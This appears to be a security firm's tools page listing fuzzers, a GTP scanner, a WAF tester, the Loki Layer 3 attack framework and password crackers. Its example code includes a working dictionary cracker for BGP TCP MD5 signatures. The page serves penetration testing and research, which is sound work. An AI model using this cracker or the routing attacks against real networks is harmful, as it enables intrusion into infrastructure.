Tools

dizzy

Python-based fuzzing framework

- Can send to Layer 2 as well as to upper layers (TCP/UDP/SCTP)
- Ability to work with odd-length packet fields (no need to match byte boundaries, so even single flags or 7-bit-long fields can be represented and fuzzed)
- Very easy protocol definition syntax
- Ability to do multi-packet, stateful fuzzing, with received target data usable in the packets sent in response
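The bit-granular field handling in the second bullet is easiest to see in code. The following is an added example, not dizzy's own code or syntax: it packs a constructed 16-bit header whose fields are 1, 3, 7 and 5 bits wide (a made-up layout, not a real protocol), and generates one fuzz case per boundary value of each field marked as fuzzable, leaving all other fields at their defaults so every case isolates a single field.

```python
from collections import namedtuple

# A field is a name, a width in bits (any width, not only multiples of 8),
# a default value and whether the fuzzer should mutate it.
Field = namedtuple("Field", "name width value fuzz")


def pack_bits(fields):
    """Concatenate field values MSB-first at bit granularity; the last byte is zero-padded."""
    acc, nbits = 0, 0
    for f in fields:
        if not 0 <= f.value < (1 << f.width):
            raise ValueError("%s=%d does not fit in %d bits" % (f.name, f.value, f.width))
        acc = (acc << f.width) | f.value
        nbits += f.width
    pad = (-nbits) % 8
    return (acc << pad).to_bytes((nbits + pad) // 8, "big")


def unpack_bits(data, fields):
    """Inverse of pack_bits: read each field's width back out of the bit stream."""
    acc = int.from_bytes(data, "big")
    total = len(data) * 8
    out, pos = {}, 0
    for f in fields:
        shift = total - pos - f.width
        out[f.name] = (acc >> shift) & ((1 << f.width) - 1)
        pos += f.width
    return out


def boundary_values(width):
    """Interesting values for an unsigned field of `width` bits: zero, one, the
    values either side of the top-bit boundary, all-ones and its neighbour."""
    maxv = (1 << width) - 1
    half = 1 << (width - 1)
    return sorted({0, 1, half - 1, half, maxv - 1, maxv})


def fuzz_cases(fields):
    """Yield (field name, value, packet) with one fuzzable field mutated at a time;
    the remaining fields keep their defaults so each case isolates one field."""
    for i, target in enumerate(fields):
        if not target.fuzz:
            continue
        for v in boundary_values(target.width):
            mutated = [f._replace(value=v) if j == i else f for j, f in enumerate(fields)]
            yield target.name, v, pack_bits(mutated)


# Constructed 16-bit header (not a real protocol): a 1-bit flag, a 3-bit version,
# a 7-bit identifier and a 5-bit length; none of the fields is byte-aligned.
HEADER = [
    Field("flag", 1, 1, False),
    Field("version", 3, 2, True),
    Field("ident", 7, 5, True),
    Field("length", 5, 9, False),
]

if __name__ == "__main__":
    print("default packet:", pack_bits(HEADER).hex())
    for name, value, packet in fuzz_cases(HEADER):
        print("%-8s = %3d -> %s" % (name, value, packet.hex()))
```

The default layout packs to `a0a9`; the fuzz run produces twelve packets (six boundary values for the 3-bit version, six for the 7-bit identifier), each differing from the default in exactly one field. A real fuzzer would feed these packets to a socket and watch the target, which is exactly what the framework above automates.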

Download:
Source - c715a7ba894b44497b98659242fce52128696a17

gtp_scan

Scanner for GPRS tunneling protocol

gtp_scan is a small Python script that scans for hosts speaking GTP (GPRS Tunnelling Protocol). To discover them it uses GTP's built-in ping mechanism: it sends a GTP packet of type ECHO_REQUEST and listens for an incoming GTP ECHO_REPLY. It can generate ECHO_REQUESTs for GTP version 1 and GTP version 2, and it can scan for both GTP-C and GTP-U (the control channel and the user data channel); only the UDP port differs between the two. In the output the received packet is displayed and the basic GTP header is dissected, so one can see, for example, a GTP version 1 host answering a GTP version 2 ECHO_REQUEST with a 'version not supported' message. Tests have shown that there are some strange services around which answer a GTP ECHO_REQUEST with a lot of weird data, which leads to 'kind of' false positives; they are easily spotted by checking the output data with your brain ;) (e.g. there is no GTP version 12).
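To make the probe and the header dissection concrete, here is an added example (written for this page, not gtp_scan's own code) that builds the GTPv1 and GTPv2 Echo Request datagrams, dissects the four header octets common to both versions, and classifies a reply the way the paragraph describes: a genuine Echo Response, a version-1 host rejecting a version-2 probe with Version Not Supported, or an implausible header from a service that answers with junk. The sample replies are constructed, not captured; the port constants are the standard GTP-C (2123) and GTPv1-U (2152) ports.

```python
import struct

# Standard GTP ports: GTP-C (v1 and v2) on 2123/udp, GTPv1-U on 2152/udp.
GTP_C_PORT = 2123
GTP_U_PORT = 2152

# Path-management message types, identical in GTPv1 and GTPv2.
ECHO_REQUEST = 1
ECHO_RESPONSE = 2
VERSION_NOT_SUPPORTED = 3


def build_echo_request(version, seq=1):
    """Return the bytes of a minimal GTP Echo Request for version 1 or 2."""
    if version == 1:
        # Flags 0x32: version=1, PT=1 (GTP rather than GTP'), S=1 (sequence number present).
        # The v1 length field counts everything after the mandatory 8-octet header:
        # sequence(2) + N-PDU number(1) + next extension header type(1) = 4.
        flags = (1 << 5) | (1 << 4) | (1 << 1)
        tail = struct.pack("!HBB", seq, 0, 0)
        return struct.pack("!BBHI", flags, ECHO_REQUEST, len(tail), 0) + tail
    if version == 2:
        # Flags 0x40: version=2, P=0, T=0 (an Echo Request carries no TEID).
        # The v2 length field counts everything after the first 4 octets:
        # 3-octet sequence number + 1 spare octet = 4.
        flags = 2 << 5
        tail = struct.pack("!I", (seq & 0xFFFFFF) << 8)
        return struct.pack("!BBH", flags, ECHO_REQUEST, len(tail)) + tail
    raise ValueError("only GTP versions 1 and 2 are supported")


def parse_gtp_header(data):
    """Dissect the 4 octets shared by v1 and v2 headers; None if the datagram is too short."""
    if len(data) < 4:
        return None
    flags, msg_type, length = struct.unpack("!BBH", data[:4])
    version = flags >> 5
    # Length semantics differ: v1 counts from octet 9 onwards, v2 from octet 5.
    fixed = 8 if version == 1 else 4
    return {
        "version": version,
        "type": msg_type,
        "length": length,
        "consistent": version in (1, 2) and len(data) == fixed + length,
    }


def classify_reply(data, sent_version):
    """Interpret a datagram received in answer to an Echo Request of sent_version."""
    hdr = parse_gtp_header(data)
    if hdr is None:
        return "no GTP header (too short)"
    if not hdr["consistent"]:
        # Junk that happens to arrive on the GTP port: the false positives the
        # text mentions, recognisable by a version or length that makes no sense.
        return "implausible GTP header (version %d, length %d): likely false positive" % (
            hdr["version"], hdr["length"])
    if hdr["type"] == VERSION_NOT_SUPPORTED:
        return "GTPv%d host, does not speak GTPv%d" % (hdr["version"], sent_version)
    if hdr["type"] == ECHO_RESPONSE and hdr["version"] == sent_version:
        return "GTPv%d host" % sent_version
    return "unexpected GTP message type %d" % hdr["type"]


# Constructed sample replies (not real captures).
V1_ECHO_RESPONSE = bytes.fromhex("32020006" "00000000" "00010000" "0e01")  # v1, type 2, Recovery IE
V1_VERSION_NOT_SUPPORTED = bytes.fromhex("30030000" "00000000")            # v1 host answering a v2 probe
JUNK = bytes.fromhex("e0ff0010" "deadbeef")                                # "version 7", bogus length

if __name__ == "__main__":
    for ver in (1, 2):
        print("GTPv%d Echo Request: %s" % (ver, build_echo_request(ver).hex()))
    print(classify_reply(V1_ECHO_RESPONSE, 1))
    print(classify_reply(V1_VERSION_NOT_SUPPORTED, 2))
    print(classify_reply(JUNK, 1))
```

To turn this into a scanner, send `build_echo_request(v)` over UDP to port 2123 (GTP-C) or 2152 (GTP-U) of each target and pass whatever comes back to `classify_reply`. Keying the plausibility check on the version field and on the length matching the datagram size is what lets the eyeball filter from the paragraph above be automated.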

Download:
Source - bbdcc8888ebb4739025395f8c1c253fa5fd2bb15

tsakwaf

The Swiss Army Knife for Web Application Firewalls

The main purpose of tsakwaf is to support the daily work of a web application pentester.

The tool is, amongst other features, capable of fingerprinting different Web Application Firewalls and can be used to test the detection capabilities of a WAF.

Download:
tsakwaf.zip

Loki born at Blackhat USA 2010

"Layer 3 will never be the same again"

Loki - a Python-based framework implementing many packet generation and attack modules for Layer 3 protocols, including BGP, LDP, OSPF, VRRP and quite a few others.

The story behind Loki:
"I personally remember the release of Yersinia at Black Hat Europe 2005. It was a ground-breaking experience: a number of Layer 2 attacks regarded as purely theoretical until then were suddenly available in a mostly automated way. And those guys even showed some forays completely unbeknownst to me at the time. We plan to do the same in Vegas, with a new tool called Loki (after the giant from Norse mythology associated with cunning, trickery and evil). Layer 3 will never be the same again."

Code/Builds:

Sourcecode:

loki-0.2.7.tar.gz

Gentoo:
loki-0.2.7.ebuild - c29a6cca7a1f7394a473d4b50a1766e9f13fd5a5

Dependencies:
Manifest - 9338ebcc6a3cb58478671f00cac3114efe5df337

Ubuntu 11.04 i386/amd64:
loki_0.2.7-1_i386.deb - bf9fa05aa20677ac209126b78c3829940daaa8ee
loki_0.2.7-1_amd64.deb - 50f5c784f039a15613affd52e304e61fd2a16a58

Dependencies:
pylibpcap_0.6.2-1_i386.deb - e30c9c8ab1a8e1ee3ddedd05475767dc9f85b526
pylibpcap_0.6.2-1_amd64.deb - 9457644ef52fd6bfdb0da8790eee759cc4f76c8b

Fedora 15 i686/amd64:
loki-0.2.7-1.fc15.i686.rpm - 06398d9c8ca5fd0d80b0da65756b01bfe07652b4
loki-0.2.7-1.fc15.x86_64.rpm - 06c1fca3f8390cbe00e8e5c427327379c30222d6

Dependencies:
pylibpcap-0.6.2-1.fc15.i386.rpm - d7e2a9249cba4362d4e435643257ee6a89a412cf
libdnet-python-1.12-7.fc15.i686.rpm - 83bbe3895a58d264190afaef586aba8c2bd921f4
pylibpcap-0.6.2-1.fc15.x86_64.rpm - 62d8cc32ef42211584df439ace8f453a3822d5b1
libdnet-python-1.12-7.fc15.x86_64.rpm - d8e969b35b2b5613f364525f21c8e0738a42e061

Presentation:

Blackhat2010_ERNW_Loki.pdf (7MB)

Videos:

bh10-demos.tar.gz (12MB)

Loki-Wallpaper:

ERNW_loki_wallpaper_1440x900.jpg (549KB)
ERNW_loki_wallpaper_1600x1200.jpg (732KB)

Blackhat Europe 2009 Toolbox

MPLS & BGP-related tools inside

This toolbox was released alongside ERNW's talk on backbone security at the Black Hat Europe 2009 Briefings. Contents of the archive: bgp_cli, bgp_md5crack, ldp_cli, mpls_redirect, mpls_tun

SHA-256 Checksum: 01ac15edf87f707b82c1f98f6764409009681b3483b321dbe2a02de896d31e9a

bh09_all_your_packets_tools.tar.bz2
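The archive only names bgp_md5crack, so here is an added example of the technique such a tool relies on; it is written for this page and is not code from the toolbox, and it assumes the tool's approach is an offline dictionary attack against the RFC 2385 TCP MD5 signature option that protects BGP sessions. The digest covers the IP pseudo-header, the 20-byte TCP header with the checksum zeroed and options excluded, the segment data and finally the password, so a single captured signed segment is enough to test candidate passwords. The segment below is constructed (a BGP KEEPALIVE signed with a made-up password), not a real capture.

```python
import hashlib
import socket
import struct

TCP_OPT_MD5 = 19  # RFC 2385 TCP MD5 Signature Option kind


def tcp_md5_digest(src_ip, dst_ip, tcp_header, payload, password):
    """RFC 2385 digest over: pseudo-header, the 20-byte TCP header (checksum zeroed,
    options excluded), the segment data, then the password."""
    seg_len = len(tcp_header) + len(payload)           # TCP header incl. options + data
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, socket.IPPROTO_TCP, seg_len))
    fixed = bytearray(tcp_header[:20])
    fixed[16:18] = b"\x00\x00"                          # checksum assumed to be zero
    h = hashlib.md5()
    h.update(pseudo)
    h.update(bytes(fixed))
    h.update(payload)
    h.update(password.encode("utf-8"))
    return h.digest()


def extract_tcp_md5_option(tcp_header):
    """Walk the TCP option list and return the 16-byte MD5 signature, or None."""
    data_offset = (tcp_header[12] >> 4) * 4
    i = 20
    while i < data_offset:
        kind = tcp_header[i]
        if kind == 0:                                   # end of option list
            break
        if kind == 1:                                   # NOP padding
            i += 1
            continue
        length = tcp_header[i + 1]
        if kind == TCP_OPT_MD5 and length == 18:
            return bytes(tcp_header[i + 2:i + 18])
        i += length
    return None


def crack_tcp_md5(src_ip, dst_ip, tcp_header, payload, wordlist):
    """Dictionary attack: recompute the digest for each candidate and compare it
    with the signature carried in the captured segment."""
    target = extract_tcp_md5_option(tcp_header)
    if target is None:
        raise ValueError("segment carries no TCP MD5 option")
    for candidate in wordlist:
        if tcp_md5_digest(src_ip, dst_ip, tcp_header, payload, candidate) == target:
            return candidate
    return None


# Constructed sample (not a real capture): a BGP KEEPALIVE (16-byte 0xff marker,
# length 19, type 4) between two documentation-range peers.
SRC_IP, DST_IP = "192.0.2.1", "192.0.2.2"
BGP_KEEPALIVE = b"\xff" * 16 + struct.pack("!HB", 19, 4)
WORDLIST = ["cisco", "bgp", "juniper", "s3cret", "password"]   # hypothetical wordlist


def build_signed_segment(password):
    """Build TCP header (with MD5 option) + payload as a BGP speaker would send it."""
    fixed = struct.pack("!HHIIBBHHH",
                        50000, 179,           # sport, dport (BGP)
                        0x11223344, 0x55667788,
                        (40 // 4) << 4,       # data offset: 20-byte header + 20 bytes of options
                        0x18,                 # PSH|ACK
                        65535, 0, 0)          # window, checksum (not covered), urgent pointer
    # Options are excluded from the digest, so placeholder zeros of the same length suffice.
    digest = tcp_md5_digest(SRC_IP, DST_IP, fixed + b"\x00" * 20, BGP_KEEPALIVE, password)
    options = bytes([TCP_OPT_MD5, 18]) + digest + b"\x01\x01"   # MD5 option + 2 NOPs
    return fixed + options, BGP_KEEPALIVE


if __name__ == "__main__":
    header, data = build_signed_segment("s3cret")
    print("recovered password:", crack_tcp_md5(SRC_IP, DST_IP, header, data, WORDLIST))
```

Because the password is simply appended to unkeyed MD5 input, throughput is limited only by MD5 speed; the practical defence is a long random key per peering and, where supported, TCP-AO rather than the MD5 option.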

Metric-based patching with CVSS 2.0 (Newsletter 19 / September 2007)

ERNW_Newsletter_19_CVSS_de.pdf (637KB)
The ERNW CVSS calculator referenced in the newsletter is available here:
ernw-cvsscalc.zip (198KB)

Dror-John Röcher & Patrice Auffret:

Routing Protocol Security

Dror-John Röcher: ERNW Bulk Switch Config Auditor Tool

Michael Thumann: Too many secrets, download the current version

This tool was developed to crack "enable secret" passwords of Cisco routers, switches and the Cisco PIX. The current release works with brute forcing as well as so-called dictionary and hybrid attacks (a combination of dictionary and brute-force attack).

Michael Thumann: DNSDigger

DNSDigger is a tool that applies the same methods used in password brute forcing to extract as much information as possible from a DNS server.
